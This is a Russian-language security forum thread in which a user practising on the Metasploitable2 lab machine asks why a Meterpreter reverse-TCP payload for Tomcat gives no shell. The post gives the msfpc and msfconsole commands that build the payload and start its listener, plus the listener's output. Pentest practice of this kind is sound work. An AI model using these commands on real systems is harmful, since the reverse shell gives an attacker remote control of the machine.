• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 🚨 29 мая стартует курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    После старта курса запись открыта еще 10 дней Подробнее о курсе ...

Metasploit meterpreter payload

  • Автор темы Автор темы Izewlfhxw
  • Дата начала Дата начала

Izewlfhxw

Green Team
17.04.2020
52
0
Ковыряю древнюю машину Metasploitable2, а именно tomcat
Делаю нагрузку такой командой:
sudo msfpc Tomcat 192.168.146.148 4444 MSF REVERSE TCP

Получаю два файла.
В кали запускаю: sudo msfconsole -q -r '/home/kali/tomcat-meterpreter-staged-reverse-tcp-4444-war.rc
на жертве запускаю нагрузку.
Кали пишет:
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.146.148:4444

Если на жертве пишу: nc -vz 192.168.146.148 4444, то пишет, что порт открыт. И при этом мой листенер тоже какие-то призаки жизни подает. То есть вроде все IP и порты верные.
Но вот шелла с нагрузки нет. В чем может быть причина?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD